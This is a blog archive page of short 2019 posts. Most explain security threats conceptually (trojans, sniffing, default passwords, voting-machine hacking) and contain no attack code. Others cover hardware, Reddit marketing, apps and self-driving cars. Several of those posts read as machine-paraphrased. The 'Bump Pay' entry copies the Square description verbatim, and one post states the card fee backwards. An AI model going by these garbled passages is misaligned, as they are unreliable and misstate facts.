23

August, 2019

That horse bites

Horses are majestic animals, and they can be a very good friend to a human being. Well, this is true only about the real horses and not the ones that are talked about in this blog. ...
This blog discusses what trojan horses are and how they can be and are being used by cybercriminals to attack their target victims and cause massive damage to them.

Malware is actually malicious software that is programmed by hackers to perform malicious activities on the computer systems that are infected by the malware. Malicious software can be of several types and can be used to perform different types of tasks. One such type of malicious software is a trojan horse. Do not be deceived by the name as It is not a real horse. It is a type of malicious software that is coded by threat actors to pose as if it were a legitimate and trusted software. Attackers insert malicious code into legitimate software and send it to their victims. The trojan horse could be wrapped under a simple looking application, such as a calculator, or it could be hidden under the hood of a video game that a person may download from an unknown website. They use different techniques to spread the trojan horse across the internet. Attackers use email attachments, email hyperlinks, or even malicious websites to deliver the trojan horse to their victims. It is also known that nowadays not even the online mobile application download stores remain safe from hackers uploading the trojan horses on them. This puts hundreds of millions of people in a lot of danger because almost everyone uses emails these days and they tend to open any attachment without even wondering about the source of the email, and almost everyone uses a smartphone as well on which they download various apps that they use for performing their personal or official tasks, entertainment, etc. Imagine if so many people download software, which they think is legitimate, which operates as if it is legitimate, but behind the scenes, performs malicious activities that put the data or privacy of the victims in jeopardy.

Trojan horses come in various flavours and perform different functions. Some of them are security software disabling trojan, proxy trojan, denial-of-service trojan, data sending trojan, FTP trojan, destructive trojan and remote access trojan (RAT). The security software disabling trojan disables any security software installed on a computer system, such as antivirus, which makes the job of the threat actors easier. A proxy trojan converts a victim’s computer system into a proxy server, which a hacker could use to for their malicious activities and attack other computer systems. The final victim computer will see the attack as coming from the computer that has been infected by the proxy server trojan and not from the actual computer system of the hacker. A denial-of-service trojan enables an adversary to perform denial-of-service (DoS) attacks through the use of the infected computer. A data-sending trojan incorporates a keylogger that captures all the sensitive information entered into the victim computer and then sends the captured data to the threat actor. An FTP trojan allows the attackers to connect to the infected computer system over port 21 by using the FTP protocol. A destructive trojan is used by cybercriminals to destroy data that is stored on the victim's computer. A remote access trojan usually poses as a legitimate system utility and threat actors use it to fully control the infected computer system.

Let us take an example of a remote access trojan. Let's say that a person wants to clear unwanted files from their computer's hard drive and to do this they search the internet for a utility software that could help them do this. They find a legitimate looking software on a website that they had not visited previously. They download it and install it on their computer, hoping that it would help them solve their issue. Now, the utility does do what they thought it might, but underneath the good looks of a clutter removing software, it also gave full remote access to the attackers who inserted the trojan horse on the website from where the victim downloaded the software. In this way, the person who downloaded the software became the victim of a remote access trojan attack, and they have zero idea about what the attacker is capable of doing with their computer. Trojan horses are sneaky and stealthy, and appropriate measures should be taken to protect critical IT infrastructure from their wrath. Otherwise, this type of malicious software could cause significant damage to the victims.

Read More

10

August, 2019

Intel's 9th Gen Mobile Processors

With its range of processors, Intel has a strong hold over the Indian market. And today they are expanding that lineup to include more high-performance chipsets. ...
for both mobile and desktop computers. Meet Intel's 9th generation chipsets, also known as Coffee Lake.

This launch brought India the 9th generation of higher-end mobile chipsets, spanning Core i5, Core i7 and Core i9. This H-series lineup is designed across the board for a 45-watt TDP (Thermal Design Power) and will be compatible with the same motherboards as the 8th generation of chipsets.These top series of processors were generally made with gamers in mind, but according to Intel, there is a big market for creators who have slightly different needs that have grown exponentially over the past 18 months. They estimate the size of the global market to be around 130 million. Another interesting statistic from Intel stated that there are an estimated 580 million gamers and esports players, many of whom are also sports audiences. Therefore, they identify three distinct types of users who would benefit from these new products: gamers, content creators and those seeking general premium performance that prioritizes battery life.

Intel is currently introducing six mobile processors, two each under i5, i7 and i9. They are sporting 4, 6 and 8 cores respectively. The flagship i9-9980HK is the first mobile processor to support a 5GHz turbo frequency from a 2.4Ghz base clock. The' K ' suffix indicates that the processor is also unlocked and can take part in overclocking, provided the temperatures are kept under control. Laptops with these processors will soon be available in India.

These mobile chipsets also bring features such as Intel WiFI 6 that bring in theoretical Gigabit speeds, up to 75 percent lower latency, and support 4x more devices that are extremely crucial for game streamers. Other upgrades include support for Intel Optane Memory H10 and SSD 660p. Up to 128 GB of DDR4 RAM will be supported for the most demanding users. Thunderbolt 3 also makes the single-cab cut.

New additions to the desktop family mean that the lineup now includes over 25 total products, ranging from Core i9 to i3, and even Pentium Gold and Celeron chipsets. Also available are the features such as support for WiFi 6, Optane memory and Optane SSD. Intel believes that these new processors will provide 47 percent higher FPS in gaming, 2.1x faster photo editing, and about 53 percent better multitasking with mixed use, considering a 5-year refresh cycle. At the higher end (i5-9600 and above), the new chipsets are just unlocked K and KF series of chips where the F series has non-functional integrated GPUs and will require discrete graphics cards.

With this barrage of new processors available for both laptops and desktops, Intel will surely spruce up the Indian market. Early OEM adopters for India include Acer, ASUS, Dell, HP, Lenovo and MSI, whose laptops will hit the markets in the months to come. Potential consumers now have options available for desktops at each price segment so they can make purchase decisions accordingly.

Read More

7

August, 2019

Artificial Intelligence in Cybersecurity

In a world of automation, technology experts have made it so that even computers think for themselves. We are talking about artificial intelligence, which is being used in many industries for several different applications. ...
This blog discusses the ways artificial intelligence is advantageous in the cyber security domain. Artificial intelligence or AI is the technology that can be used to make specific computer systems think and make decisions by themselves.

There are two sides to artificial intelligence. One is the side that people can take advantage of in making their tasks easier and creating systems that can self-learn and perform specific functions by themselves. The other side focuses on the potential dangers presented by the ingenious computer systems that use artificial intelligence. Artificial intelligence is still in its early stages, and there is still time till a full-fledged artificially intelligent and self-aware system is created. Some examples of artificially intelligent systems are the personal assistants that are used in smartphones manufactured by several mobile phone manufacturing companies, the personal assistants available in various IoT devices, and many walking and talking robots.

Cybersecurity industry can also benefit from artificial intelligence technology. In fact, many cybersecurity controls are currently being developed that have in-built artificial intelligence capabilities that can help in keeping threat actors at bay. By using artificial intelligence, security systems can predict things, such as attack patterns, the type of attack used, whether the network traffic that is coming in is malicious or not and other things that can be predicted by leveraging artificial intelligence technology and will be helpful for security professionals in creating security strategies for an organisation.

ybersecurity is frequently portrayed as an unjustifiable fight between the assailant and the safeguard. Also, on a majority of the occasions, the adversaries are able to accomplish their objectives and dodge the security controls in light of the fact that the threat actors dependably remain one stage in front of the people who are trying to defend their systems. It gets challenging to organize various security aspects within a network as there are a lot of factors involved in each layer of defense. Attackers are easily able to exploit the human factor of an organization's network.

Cybersecurity can obtain numerous benefits from artificial intelligence. With the help of artificial intelligence, cybersecurity professionals can highly improve security processes, such as threat detection, network security, and threat handling. It enables us to re-concoct the system and network designs and the manner in which everything is connected with the assistance of wise processing machines. Security professionals can create super-intelligent networks that contain self-learning security systems that are able to take care of security breaches or other types of security threats. Ingenious bots might just supplant the vulnerable human component of a network in the coming future. The beginning of AI can possibly make the cybersecurity industry to flourish.

Examples of artificially intelligent cybersecurity systems could be the Intrusion Detection Systems and Intrusion Prevention Systems that use artificial intelligence to detect and prevent cyber-attacks. These systems are able to figure out the malicious traffic from the legitimate one and help organizations to safeguard their critical systems and information. These systems are able to lower down the number of false positives and increase the percentage of detection of cyber-attacks. Attackers keep on using various new tricks and techniques to fool security systems. One such technique is using polymorphic malware. But, security devices, such as IDS and IPS, that use artificial intelligence can easily track down such attacks and save the company's network and sensitive information from being compromised.

Read More

1

August, 2019

Insider Threat

Companies spend thousands of millions of dollars to design and build there business' infrastructure. On top of that, they spend thousands of dollars in its operation and maintenance, and to protect that infrastructure, organisations spend even more money on buying and implementing security controls. ...
These controls, however, tend not to be enough to stop an adversary from compromising the organisation's network and the systems attached to it. Merely placing security controls in place is not enough to prevent threat actors from stealing sensitive information. This blog talks about how insider threat been a great factor behind organisations’ compromised networks and security breaches.

An insider is a person who is considered as being related very closely to an organisation. The insider can be anyone, such as the company's employees, maintenance staff, suppliers, or partners. They could even be former disgruntled employees or contractors. The person could have authorised access to an organisation's systems, premises, server rooms, sensitive records, etc. Insider threat occurs when the closely related people leverage their access rights to cause damage to the organisation's sensitive information, the network infrastructure, or the vital computer systems. In other words, insider threat in the type of security threat when an insider purposefully or unexpectedly abuses access to contrarily influence the confidentiality, integrity, or availability of the association's sensitive data or network infrastructure.

Insider threats are highly dangerous, and it is crucial to protect the organisation against them because they are very hard to detect even by using the state-of-the-art security tools and they can cause significant damage to the organisation. Insider threats could occur due to people performing malicious activities or could occur due to unintentional or accidental actions of the people. The malicious insider threats have the common goals of taking part in corporate, industrial or other types of espionage, stealing intellectual property, fraud, and sabotaging the target organisation. The insider threats that occur accidentally usually involve convenience, incorrect judgement, malicious software, stolen usernames and passwords, and errors made by humans.

A lot of damage can be caused due to insider threats. For example, let us say that an employee of an organisation, while trying to share a highly top secret piece of information with someone, accidentally shares that piece of information with someone on the outside or someone who was not intended to know about that information. This sharing of a highly top secret piece of information with an unintended entity could, as a result, become the reason for causing vast amounts of damage to the organisation of which the information was shared about. Another example of an insider threat could be when an employee who wants to take revenge on the company that he or she used to work for. They could use the knowledge that they have about the organisation's infrastructure and IT assets to orchestrate an attack against the organisation. As they know about the company's internal network and probably the internal IP addresses of the computer systems present in the company's network, they could create a malware or an exploit with which they could attack and compromise the company's network easily and cause major damage. They could either steal sensitive information, such as intellectual property or severely damage the computer systems so that they stop functioning altogether.

69% of associations have previously stated that they have encountered an endeavored danger or debasement of information over the most recent times. Research shows that the average cost of insider threat for an organisation is more than $8 million, and it takes more than two months for the inhibition of an insider threat.

Read More

31

July, 2019

Reverse Engineering

People use several different things nowadays to make their tasks easier. They don’t know how those things work. They just use the hardware and software and keep them away. ...
However, there are certain people who are interested in knowing about the inner workings of all the hardware and software things and use them for their advantage. This blog discusses the process of reverse engineering and the ways threat actors can take advantage of it and orchestrate an attack.

Reverse engineering is the process by which one can figure out the inner workings of a hardware or software object. The process is undertaken to discover the architecture, designs, or to gain knowledge about the object or its operation. Reverse engineering can be applied to objects belonging to several different fields, such as software engineering, electronic engineering and mechanical engineering. The process of reverse engineering is mainly undertaken to perform analysis and not to create copies of an object; however, some people do take advantage of it and create replicas of an object, but that is another story. Reverse engineering is also done to re-document old legacy systems, or to perform competitor analysis.

Malware researchers use reverse engineering for analysing the different variants of malware that exist in the wild. They dissect the malware code to figure out how the malware is working so that they can help stop the malware from spreading and also create controls that can prevent the malware from entering the network again. Reverse engineering helps create malware signatures that can be used in IDS and IPS systems, host-based anti-virus software, and all other security controls that use signature-based detection and prevention.

Cyber-criminals can use reverse engineering to find out how a particular type of software or hardware works and create multiple hacks that can make the software or hardware do things that it is not supposed to do. For example, companies sell paid licenses for their operating systems which users can buy if they want to use a particular operating system. But, attackers figure out ways to sell a modified version of the operating system for free. They are able to do this with the help of reverse engineering. They figure out how the code works, and find a way to make sure that the operating system does not require a licence key to be fully activated. They reverse engineer and modify the installation files in order to achieve this, and then they put out the installation package on the internet for free. One should, however, not trust these operating system installation files as they have been reverse engineered by an attacker, so you never know what might the code be doing underneath the cover of a legitimate operating system.

Another example of reverse engineering as used by adversaries is when an attacker modifies the APK file that can be used to install a specific open-source health app on an Android device. The people installing the app would think that the app is legitimate while actually it has been modified into a malicious app. The attacker could figure out how all the data is being transmitted and exchanged between the app and the servers, and figure out a way to steal that data by just modifying the code of the app, and not using any other malicious software. This could cause people to lose their protected health information, and that, in turn, could cause even further damage.

Read More

29

July, 2019

The importance of security inside the cloud

It is a world where people love mobility. They like it when they can access their online resources from anywhere in the world as it gives them the power to work while they are on the move from one place to another. This new-age need to be mobile raised the demand for cloud computing, which in turn, increased the innovation going on in the cloud computing domain. ...
Numerous new cloud technologies have come into existence that enable users to perform several different tasks with ease and with the comfort of being wherever they want to be. Cloud providers implement various security technologies to protect their cloud infrastructure from the multitude of cyber attacks that pose a threat to the infrastructure and its users. Well, that is regarding the security of the cloud. But, what about security inside the cloud. This blog talks about how important it is to also secure what lies within the cloud, and what impact cyber attacks could have on the cloud service provider and their customers.

A cloud is basically a network infrastructure that contains various network components, such as storage, servers, computer systems, that are provisioned by a cloud service provider to their customers according to the needs of the customer. The components are virtualised to support several customers and also to save costs. A cloud service provider has the responsibility to maintain the infrastructure and keep it running. There is another critical responsibility that the cloud service provider has, and that is to secure the cloud's infrastructure from any and all cyber threats. Whether it be a Denial-of-Service attack on the cloud servers, the storage components, etc., or a malware attack on the cloud provider's systems that host users' resources, it is the responsibility of the cloud service provider to keep the cloud infrastructure secure at all times. This protection of the cloud infrastructure itself is referred to as security of the cloud. However, when it comes to cloud computing, merely putting security measures in place to protect just the cloud infrastructure is not even close enough to make sure that cybercriminals won't bother attacking the cloud infrastructure and harming the cloud service provider and their customers. There is a need to implement security controls inside the cloud, as well. By inside the cloud, it means everything that lies within the cloud components, such as information, applications, etc. This is referred to as security in the cloud and is very important to fend off any cyber attackers who try to compromise cloud infrastructure and cause damage to critical assets.

Security in the cloud is essential because just as adversaries compromise physical systems, they can also easily hack the virtual servers that are used by the customers of a cloud service provider. For example, let us say that inside a cloud virtual machine, a user is running a Windows operating system version that has not been updated for quite some time now. Now, just as a hacker would be tempted to attack a physical machine, they could also attack the virtual machine through any cyber attack that can take place through the web. A user might fall victim to an attacker and may download a trojan horse, which would then infect the virtual machine internally. Some people are also in the habit of not installing any security software in the virtual machine that they use thinking that the cloud service provider would have secured the virtual machine from the outside. This is not good thinking as even if the cloud provider would have secured the virtual machine from the outside, malicious software could still infect the operating system as we saw in the example above. It is good to secure the cloud infrastructure from the outside, but having all that security would be no use if threat actors can cause damage from within. A good analogy would be that there is no point of having a boat without holes if someone keeps pouring water into the boat itself. This is because it will still sink due to the water inside it.

Security in the cloud is equally crucial as the security of the cloud, and every cloud user has to understand this if they are to keep the critical assets that they have in the cloud safe from cybercriminals.

Read More

25

July, 2019

Dangers caused by default configurations

It is 2019, and the world has reached the point where several different types of technologies have emerged and can be used to do pretty much everything. From cloth stitching machines to the radar systems in aircrafts, everything is loaded with the state-of-the-art technologies. ...
Every gadget can be customised and configured according to ones own needs, and various mechanisms exist that people can use to secure these gadgets. Devices can be configured with appropriate security settings; however, there are a lot of devices that manufacturers sell with default configurations, and this has caused and is still causing security concerns in the past. This blog talks about the default configurations that various devices are left with by the manufacturers and the people who use them, and how this ignorance leads to those devices getting attacked by cyber-criminals.

Leaving a device in default configuration means that all the settings that are present for the device are left unaltered and in the factory settings. In other words, the settings of the device are not changed at all after it is bought by someone and are left the way they were when the equipment was manufactured. The default configurations could include the username, password, the security protocols that are being used, or some other setting of the device in question. The devices that are most susceptible to being left with default configurations are routers, wireless access points, security cameras, and many other devices.

Routers and wireless access points are mostly left with default usernames and passwords that can be used to access their management portals. An attacker could use that management portal to become a Man-In-The-Middle and intercept the network traffic that is being transmitted through the router or the wireless access point. By intercepting that traffic, threat actors could further steal sensitive information, such as credentials to other websites that a user visits, or some other critical information. The wireless access points are even left with default Wi-Fi passwords that anyone can read off the label and use to connect their smart devices to the wireless access points. Security cameras are used all around the world in hospitals, apartment buildings, schools, colleges, stadiums, government facilities and even on roads. These cameras are used for surveilling the surroundings and making sure that no malicious activities are taking place in those surroundings. Security cameras, when left with default configurations by the people who own them, can become a weapon for threat actors. The attackers could compromise those security cameras by logging in using the default credentials that manufacturers set while manufacturing these devices, and record the video footage from cameras that are placed at locations access to which is prohibited to unauthorised personnel. For example, if a camera placed inside a research facility and attackers hack into it using the default credentials, then they could record videos and take screenshots of sensitive information regarding the infrastructure and other assets that are present within the research facility. They could then use that information themselves to orchestrate even more sophisticated attacks, or they could sell that information to competitors or to some people from other countries who want to do espionage on the target facility.

There have been a lot of cases where default passwords have been the reason for security breaches and information leaks. It has been reported that around 63 per cent of security breaches have involved stolen, weak, or default passwords. It is, therefore, necessary to make sure that such type of misconfigurations are taken of by manufacturers and their customers.

Read More

24

July, 2019

Can Reddit Be the Future Of Online Marketing For Businesses?

What's the regret about advertising here? Reddit is only a small part of a growing amount of evidence that poses this exact question: ...
the marketers are finally infiltrating the brand-name social media platform. Why would they not? Thousands of posts like this are the source of a vibrant internet discussion between Reddit users, Redditors, on a platform every day where individuals can share nearly anything–videos, pictures, issues, thinking, analyses often with an equally well-meaning group that takes on that thing.Career satisfaction, however, is likely to be regretted by marketers who keep ignoring Reddit as a publicity medium.

The CEO of Reddit, Steve Huffman, and his Team work hard to attract advertisers to his platform, while the concept of a feasible solution to the duopoly between Google and Facebook is now being given further credibility by significant holding agencies. This is the third most visited websites in the United States to become the self-proclaimed "Internet Footprint" of the site with 330 million active monthly users. Most of these 330 million are men, educated in colleges and under the age of 35.

But it's not demographics that makes Reddit special. The navigation of the site may be difficult at first, as many new editors tell you. It comes with a distinctive vocabulary and rewarding website contributions scheme, which can lead to a flood of issues for customers. Luckily, it's not difficult to answer all you need to do is ask.Now large advertisers claim customers are asking more frequently about the platform, and the almost 15-year-old business seems to be the next biggest thing to do in marketing. There are three tips that might help you if you're a marketer who is looking to dive into Reddit. However, demographics aren't the only thing that makes Reddit unique.

Be helpful and earn Karma
When editing mail material or remarks other users enjoy through 'upvoting,' the social currency, which enables the site, earn karma. Conversely, contributions other people see as being detracting from the bigger discussion are declined, so karma can just as readily vanish.New brands on the website should work together to organically boost their' karmic rating' by posting remarks and value links to other customers, reflecting real efforts to engage in meaningful interacting with the society. Planning and consideration are needed, but the rewards can be worth the effort. No special privileges you will gain, but you will be seen to be more credible

Answering Everything
The active users of Reddit tend to subscribe to a multitude of groups, called subreddits, that correspond to their interests. Brands that have a say on a specific subject should strive to be active in smaller groups. Redactors often are keen to learn, and a preferred medium on the platform is one of the best ways of learning and informing.Hope Horner, CEO of the Lemon light Media video manufacturing business, stresses that brands should be of value instead of advertising importance in Reddit when sharing any media. "Reddit users are particularly sensitive to ads, so don't publish open promotional videos.

Finding related community
Reddit offers brands realistic engagement opportunities in a format other than that of other platforms. One of the wider categories of subscription, listed as /r / AMA, enables publishers to generate a "Ask Me Anything" inviting other users to do that precisely. Promotors, politicians, managers and other public figures have used this outlet to connect authentically with users and to offer highly valued transparency.Some brands have also started to test the format. For example, Audi hosted a live AMA series with celebrities and high-performance cars. Dubbed "Think Faster: The Faster AMA in the world," the series has been functioning because it has not been promoted. Instead of focusing on the products, Audi ensured its famous visitors, which attracted a great deal of attention to the brand, were given special attention.

Marketers still face some interesting barriers to using Reddit as an ad platform efficiently. Karma may disappear fast, subreddits may be difficult to break, and AMAs may go awfully incorrect. Nevertheless, the website user base represents for many brands a potential gold mine, and its leadership is ready to assist brands ready to start experimenting with it. Maybe the perfect time now.

Read More

20

July, 2019

Sniffing attacks

Bob works in the accounts department of a very large firm. Bob is on vacation with his family, and he is enjoying a lot. He is sitting at the beach which is right in front of the hotel that he is staying at. Someone from Bob's office calls him and asks him to ...
check up on something at the office. Bob goes to his hotel room, picks up his laptop, and connects it to the hotel Wi-Fi. Knowing very little of the dangers of using a public wireless network, Bob goes ahead and uses a remote connection service to connect to his office’s network so that he can access the files that he is supposed to check. He finishes up his work and goes back to enjoying his vacation with his family. After his vacation is over, he goes back to his office and finds out that there has been a security breach, and that someone had used the company’s bank accounts to transfer money overseas. In an investigation of the security breach, the company finds out that someone had used Bob's credentials to access the files belonging to the accounts department remotely. Now, Bob came under the sword, and he is in danger of losing his job.

Remember how Bob used the hotel Wi-Fi to access his office network, well it turns out that a hacker was already connected to the same wireless access point as Bob and that the attacker had sniffed off Bob's remote connection credentials, and used those to login into the company's network and steal information regarding the company's bank accounts. This blog talks about sniffing attacks and the impact they can have on the victims that fall prey to this type of cyber-attack.

In the same way, like people listen to other people talking and sharing information, threat actors can use sniffing to capture their victims' information. Usually what happens in a sniffing attack is that threat actors use a single tool or a combination of several tools and techniques to make their computers connect to a particular network and listen or intercept the network traffic that is flowing on that specific network. One typical example of a sniffing attack would be when an attacker manages to connect their computer to a wireless access point and then sniffs the network traffic that flows to and from all the client devices that are connected to that same access point. Now, the target wireless access point could be located any place, such as a hotel that you might be staying or wanting to stay at, an airport from which you have your next flight or are going to land at, a restaurant where you would be having your next meal, or at a local subway station. The point is that anyone could become a target of a sniffing attack anywhere in the world, and if people are not vigilant enough, then there could be several adverse consequences that they might have to face.

By using sniffers, adversaries can steal a lot of sensitive information about their victims.The information could include usernames and passwords for victims' accounts, bank account information, the information regarding the different types of protocols that are being used for a specific kind of communication that might be taking place within an organisation, the type of applications being used by the victims, and the information regarding which parties the communication is taking place between. A sniffing attack is usually very hard to detect as the sniffing utilities that are used by the threat actors do not cause any disruptions in the operation of the network or of the client devices that are connected to that network. The sniffing utilities only sit silently and keep listening for information.

Many times, sniffing attacks pose as a starting point for further more sophisticated cyber-attacks, and this makes them even more dangerous. Hence, security controls should be put in place for protecting against sniffing attacks, and people should be aware that such attacks do exist in the world.

Read More

19

July, 2019

7 Necessary Apps for Every Entrepreneur

All today have their favourite portable applications, which render their private and company life easier. But are there applications for entrepreneurs and promoters of start-ups that must be? ...
For start-up entrepreneurs, finding the applications that make your company and yourself a difference is essential. Many of the pioneers in this field are already specialists. Heck, applications are nowadays the company of many start-ups. However, start-ups may not be so skilled in other areas.You do not need a boot app — most company applications are likely suitable - but your primary problem should be applications that provide lower, company-like energy.Here are some of my favourite applications which are especially suitable for beginners. Most of them you may already understand and use, but likely not all:

1. Square:

The famous square gives beginners and businesspeople the possibility to receive credit cards from their devices. The Square Card Reader basically transforms your smartphone into a portable cash register that is of particular benefit to advisors, truck drivers (an up-and-coming start-up sector) and even certain traditional distributors. The readers accept Visa, MasterCard, Discover and American Express. You receive 2.75% per swipe. Maybe most important, there are no extra monthly charges or settling expenses to create a merchant account that is nearly difficult to do for start-ups.

2. Bump Pay:

The famous square gives beginners and businesspeople the possibility to receive credit cards from their devices. The Square Card Reader basically transforms your smartphone into a portable cash register that is of particular benefit to advisors, truck drivers (an up-and-coming start-up sector) and even certain traditional distributors. The readers accept Visa, MasterCard, Discover and American Express. You receive 2.75% per swipe. Maybe most important, there are no extra monthly charges or settling expenses to create a merchant account that is nearly difficult to do for start-ups.

3. Drop Box:

Every start-up employee was captured at some stage on a flaw that required access to a folder on their desktop, but it is not visible at all. DropBox, the common cloud-based storage and sharing service that is simple to use, is still the best way to tackle this problem. When the DropBox is mounted on your desktop, you just drag and drag tiny or big documents or videos into your Dropbox file, and you can then retrieve them from any desktop and from your smartphone. (Microsoft and Google have launched comparable facilities lately.) Start with the free variant. If you need extra storage, you can upgrade to a paid scheme subsequently.

4. Quick Office:

QuickOffice is a series of applications for handling the Android, iPad, iPhone and Symbian records in Microsoft Office. Interestingly, the effect of their latest takeover by Google on the item will be seen, although most specialists agree that the association offers both firms an advantage in the portable phone industry. Check for schedule choices on the website, and then, wherever you are and your mobile, you can generate and edit files.

5. Fat Stax:

FatStax 2.0 for iPad is an app for consumers to browse and show their documents, including PDFs, PowerPoint slides and video, if you need to have a portable Sales app. The app also operates offline so that during your marketing conference you do not have to worry about discovering a wireless link.

6. Skype:

Most techies understand Skype (and probably use it). But did you load the Skype portable app? Excellent for calling conferences – just don't get it going when you don't use it (it's battery and bandwidth).

7. Ego:

If you want to verify the statistics of your location, check out Ego. Ego lets you view visits rapidly every day, every month, or even every hour. On Twitter and more, you can also see how many individuals are following you at one location.

Read More

17

July, 2019

Self-Driving Cars Can Be the Next Biggest Business. This is How It Is Possible

The first Back to the Future film has been released for 30 years. I recently watched it and was amazed at the changes in vehicles over the years. ...
The film gives you an insight into the future of a flying car in 2015. How can vehicles have not seen an increase in material lives since 1985? I am confident that all vehicles will have their own choice 30 years from today and most of them will have their own choice in 10 years.We overestimate our achievements in a year and underestimate our achievements in a century. Think about it— in 2007, Apple reinvented the phone with only one screen in your hand, while Google ensured that the operating system was virtually free and accessible for masses.These techniques were crucial and life changing. Now is the time to reinvent the car experience. It's an interesting moment for the technology giants as well as start-ups and other technology companies, as they make it a duke in this fresh holy war platform.

The long-term advantages for self-driving cars range from environmental, security, health, equilibrium between family life, geopolitical and general financial advantages.The safety advantages will probably be material because less accidents occur. Reduction of traffic accidents and, in turn, reduction in pollution would be at the expense of the environment.There are significant financial advantages–even as deflationary as the current one of Amazon Web Services or the collapse of the Berlin Wall in 1989. We can be less dependent on the oil industry if we spend less cash on fuelling and maintenance. This could imply fewer resources from a geo-political point of view.

Cars driving themselves can also help to reduce inflation, because it is likely that we would spend less on gas and repairs. It can also have an impact on immobilization. We'd better be able to move from cheaper areas of the city to our jobs, as traffic accidents would be lower and travel from work or school less time wasted. The ultimate time creator can be self-driving cars with direct and indirect advantages. They can give us more time to work, sleep or practice with our families. The outcome is a healthier, more balanced and happier life. Anyone who does not agree should attempt to drive during the hour of rush in Los Angeles.It could be like adding hours to our day with self-driving cars because we would be able to work in our vehicles on a journey. Other regions of life could also affect the concept of productivity on the road. We can use time to study, which resonates with me personally because I have always thought that schooling can solve almost all the issues of the world. It appears to be a certainty, with so many benefits at stake, that we will see a start-up software rush in time. It is probable that companies will create the warmest auto operating system and applications for it.

Yes, there are dangers to self-driving cars, but every time we get behind the wheel, they are no higher than what we face. In fact, many suggest that our risk of harm will be reduced.It is now estimated that 94% of car accidents are human mistakes. While independent cars may not yet be perfect— in reality, they are still evidently evolving and massive untested — they have a huge potential to save countless life. We have already experienced improvements: with Google's self-driving efforts, Google has worked hard to minimize accidents. As automated software algorithms and artificial intelligence systems progress, this margin of error will be even lower.

Google and Apple are obviously competing with Tesla for their auto engineering talent to lead the future automotive operating system. This fresh holy war platform will lead to important savagery, but rivalry will lead to innovation. In other words, we could only see the sector eventually hitting the acceleration after so many stops and starting.

Read More

15

July, 2019

Hacking voting machines

Person 1: Hi! Did you vote in this election?
Person 2: Oh! Yes. I did vote this time.
Person 1: I wonder which party is going to win in this election.
Person 2: Wait a second. There is news on the TV regarding the elections. Could you turn the volume on the TV up, please?
...
Person 1: Sure. I wonder what it is about.It has just been reported that the recent political elections had been rigged by cybercriminals. The government has decided to cancel the result calculation and has declared that there will have to be another round of elections.
Person 1: Oh my god! I hate those hackers.
Person 2: Me too!
Rigging political elections has been the motive of several bad actors in the past and has continued till date. Earlier, when there used to be elections in which people had to put their votes in a ballot box in the form of a slip, the people who wanted to rig the polls hired some muscle to capture ballot boxes and put several bogus votes in them in favour of the party that they supported. Such activities caused there to be biased election results. Nowadays, there is no more paper-based voting. People cast their votes using high-tech electronic voting machines. These machines have buttons on them, and each of those buttons is related to a specific political party. When casting their votes, people just need to go to the polling station and press the button that corresponds to their party of choice. This is a particular type of voting machine. There are specific voting machines available that have built-in wireless local area network, and as they say that if something emits a signal, then it can be hacked, therefore, it is no surprise that these machines can actually be hacked. Well, it is partially a surprise because these machines are used in one of the most important events for a country, and yet they are vulnerable to cyber attacks.This blog discusses how cybercriminals use various tools, tactics and techniques to hack into an electronic voting machine, and what impact can it have on a country, which by the way is a pretty big target.

Many countries use what is called a Direct Recording Electronic voting machine for citizens to use for casting their votes during political elections that are held in the country. These voting machines have a touch screen display, printer, built-in wireless local area network, modem, and battery backup. These machines are installed with election management software, and some are even installed with software that allows officials of the election to completely control everything about the process of election programming. Most of these voting machines are based on Windows XP, which makes them even more vulnerable to hacking. An example of an attack that can be performed on such type of voting machine is as follows. As the machines are Windows XP based, a threat actor could easily find an exploit for the machine. Let's say that a hacker discovers that the Remote Desktop Protocol port is open on the voting machine. Finding this tempting entry point, the attacker begins their exploit. The attacker uses a certain hacking tool and manages to gain access to the machine. Now, the adversary can access all the election data that is stored on the target machine. They could choose to either alter or destroy all the data. Whatever they decide to do would cause a lot of damage to the victim country. For example, if they choose to destroy all the data, then all work that the country's election officials would have done will go to waste, and all the money put into the election process would also go to waste. There would be a significant financial loss caused to the victim country. It could also cause conflicts between the different participating political parties as they may think that one or more of their opposing parties did it just because they were afraid of losing the election. All in all, hacked voting machines are not a good thing for a country as they only result in losses or people fighting among themselves.

The vendors who manufacture voting machines need to up their security game if a country wants to be free from or at least feel safer against election hacking.

Read More

6

July, 2019

That horse bites

Horses are majestic animals, and they can be a very good friend to a human being. Well, this is true only about the real horses and not the ones that are talked about in this blog. ...
This blog discusses what trojan horses are and how they can be and are being used by cybercriminals to attack their target victims and cause massive damage to them.

Malware is actually malicious software that is programmed by hackers to perform malicious activities on the computer systems that are infected by the malware. Malicious software can be of several types and can be used to perform different types of tasks. One such type of malicious software is a trojan horse. Do not be deceived by the name as It is not a real horse. It is a type of malicious software that is coded by threat actors to pose as if it were a legitimate and trusted software. Attackers insert malicious code into legitimate software and send it to their victims. The trojan horse could be wrapped under a simple looking application, such as a calculator, or it could be hidden under the hood of a video game that a person may download from an unknown website. They use different techniques to spread the trojan horse across the internet. Attackers use email attachments, email hyperlinks, or even malicious websites to deliver the trojan horse to their victims. It is also known that nowadays not even the online mobile application download stores remain safe from hackers uploading the trojan horses on them. This puts hundreds of millions of people in a lot of danger because almost everyone uses emails these days and they tend to open any attachment without even wondering about the source of the email, and almost everyone uses a smartphone as well on which they download various apps that they use for performing their personal or official tasks, entertainment, etc. Imagine if so many people download software, which they think is legitimate, which operates as if it is legitimate, but behind the scenes, performs malicious activities that put the data or privacy of the victims in jeopardy.

Trojan horses come in various flavours and perform different functions. Some of them are security software disabling trojan, proxy trojan, denial-of-service trojan, data sending trojan, FTP trojan, destructive trojan and remote access trojan (RAT). The security software disabling trojan disables any security software installed on a computer system, such as antivirus, which makes the job of the threat actors easier. A proxy trojan converts a victim's computer system into a proxy server, which a hacker could use to for their malicious activities and attack other computer systems. The final victim computer will see the attack as coming from the computer that has been infected by the proxy server trojan and not from the actual computer system of the hacker. A denial-of-service trojan enables an adversary to perform denial-of-service (DoS) attacks through the use of the infected computer. A data-sending trojan incorporates a keylogger that captures all the sensitive information entered into the victim computer and then sends the captured data to the threat actor. An FTP trojan allows the attackers to connect to the infected computer system over port 21 by using the FTP protocol. A destructive trojan is used by cybercriminals to destroy data that is stored on the victim’s computer. A remote access trojan usually poses as a legitimate system utility and threat actors use it to fully control the infected computer system.

